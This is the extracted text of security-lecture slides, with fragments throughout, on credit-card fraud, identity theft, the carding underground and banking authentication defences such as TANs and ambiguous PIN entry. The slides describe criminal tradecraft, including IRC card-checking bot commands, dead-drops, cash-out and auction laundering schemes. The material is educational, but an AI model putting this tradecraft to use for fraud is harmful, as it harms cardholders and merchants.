Dishonest restaurant/bank/hotel employees
• Very small-scale, but provides the most information
• A good job for credit-card harvesting is pizza delivery
– Obtain card numbers from phone orders
– Look out for empty houses to use as dead-drops when
Online shell auctions (online variant of dishonest
• Various massive breaches (
• This has been going on for years, but only became public after California passed legislation requiring that victims be notified
– Since most US companies do business with California, it
Bribing employees of overseas call centres
• UK Evening Standard reports that organised crime gangs are offering a year’s wages to call centre staff for account access
Offshoring is an accident waiting to happen
—BBC News
Dishonest call-centre employees
• US bank call centre employees in Pune, India, siphoned Rs
The money was used to splurge on luxuries like cars and
—Times of India
• The UK Sun newspaper bought 1,000 bank accounts from a Delhi call centre for £4.25 each
– Account information
Stolen personal information is so easily available that the best protection is that crooks simply can’t use it all
• Number of identities stolen in an 18-month period from Feb ’05 — Jun ’06: 89 (Privacy Rights Clearinghouse)
• The smaller the breach, the greater the chance of the information being misused by crooks
Fraudsters […] can use roughly 100 to 250 [stolen identities] in
Social security numbers (SSNs) and other information can readily be bought online
Owners sell or rent their SSNs
• Illegal immigrants need a legal identity to work in the US
– 1986 Immigration Reform and Control Act created a
• Group B lends or rents their SSN to Group A
– ID belongs to a legitimate person, so there are no
– Homeland Security is so busy looking for terrorists behind every bush that they’ve almost stopped investigating illegal immigrants (98% drop since 9/11)
No national stolen SSN database exists (!!)
Prices for a CD or DVD of stolen data in Gorbushka
Some of this information is also available in places like the
• $110 to
• Other sites sell similar information for $90–150
– Reputable firms work around problems in obtaining the information by farming it out to contractors and not asking
Information security by carriers to protect customer records is practically nonexistent and is routinely defeated
—Robert Douglas, privacy consultant
• To see how dangerous this could get, a blogger tried buying the call records for Supreme Allied Commander of NATO
– Cost $89.95 from
– Required only the cellphone number and a credit card
• This seems to be explicitly permitted by US law
A provider […] may divulge a record or other information pertaining to a subscriber to or customer of such service […] to any person other than a governmental entity
—18 USC 2702

Prices are openly published or subject to private
• “CVV for $1, CVV with SSN for $10, bank account $50, …”
Card checks are performed via IRC bots
• !chk cardno expiry
• !cclimit cardno
• !cvv2 cardno expiry
– CVV is the 3–4 digit crypto checksum on the back of the
– Required as an extra check by some merchants
• This is more sophisticated than many merchants!
User identities are hidden via IRC proxies (bouncers) on
Cashiers cash out the contents of the drops
• Take 50% of the funds to move the money out via services like
• Many, many ways to cash out the funds.
Example: Find a business with $10K of debt, agree to pay them $20K if they
Everything can be outsourced
• Scammer buys hosts for a phishing scam
• Buys spam to lure the punters
• Buys drops to send the money to
• Pays a cashier to cash out the accounts
You wonder why anyone still bothers burgling houses when this is so much easier…
The money seems to be in being the middleman

Less obvious: Use online auctions for money laundering
• Advertise new $1000 digital camera on eBay for $800
Buyer countermeasures
• Watch out for auctions asking for cash-equivalents (money
• Ask for the product’s serial number before buying (requires a middleman to hold the payment)
Merchant countermeasures
• Require shipping address on file with the issuing bank

Credit cards confuse identification and authorisation
• Credit card must be both public (identification) and private
Credentials are easily duplicated
• Real owner of A is never notified of the existence of B
• Bad guy now “owns” B
Properly-designed mechanisms separate identification and authorisation credentials
• Username (public) and password (private)
• London Underground ID card (heavyweight identification) and

The PIN entry device shall be a secure cryptographic device […] during PIN entry at a terminal, protection becomes the responsibility of the card acceptor
—AS 2805.3:2000, Electronic Funds Transfer — Management and Security
Windows 95, Windows 98, Windows ME, or Windows CE […] cannot be used in secure environments
—“Writing Secure Code”, Microsoft Corp, 2004
No account holder liability in respect of any […] forged, faulty,
and then using them for fraudulent means constitutes “forgery”
• The customer would not be liable

[Diagram: card payment flow between Merchant, Acquirer and Gateway: purchase order, purchase instruction, authorisation, AuthReq]
• Some attempt to mitigate this by splitting the costs
Merchants will only ship to the CC billing address
• Sledgehammer approach inconveniences many customers
Banks aren’t too worried, merchants carry the cost
• Consumers pay via increased prices
Each step back buys 1–2 years
• Ship-to-billing-address is the last line of defence
• One-time password per transaction
– Send new TANs when the old list is about to expire
Used by European banks for online banking
• Marginal cost is close to zero
– TANs are sent out with bank statements
• Remarkably effective against online credit card theft/fraud
– The one thing you can’t do online is intercept paper mail
• Requires participation by banks
– Non-European banks haven’t got past username + password
– Currently the pain isn’t sufficient to motivate changing the CC authorisation system
Still not 100% effective
• Virus reads the bank’s page from the browser cache
• Pops up a window asking the user to re-authenticate due to
– Users are conditioned to accept this
– Too many banks use Javascript pop-ups, aggressive session
• Username + TAN go to eastern Europe, user’s session
European banks are switching to challenge-response calculators in response to this type of attack

Ambiguous typing
• Have multiple choices for each PIN digit
• First digit = 1 or 5
• Second digit = 7 or 9
• Third digit = …
• Attacker can only determine a possible choice of PIN digits,
• ATM carries out a brute-force attack on the actual PIN value
More useful with ATMs than computers
• Spyware can narrow down the choices by finding common digits over multiple PIN entries

This is a social problem that can’t be fixed using
• Current attempts to fix it via legislation are ineffective or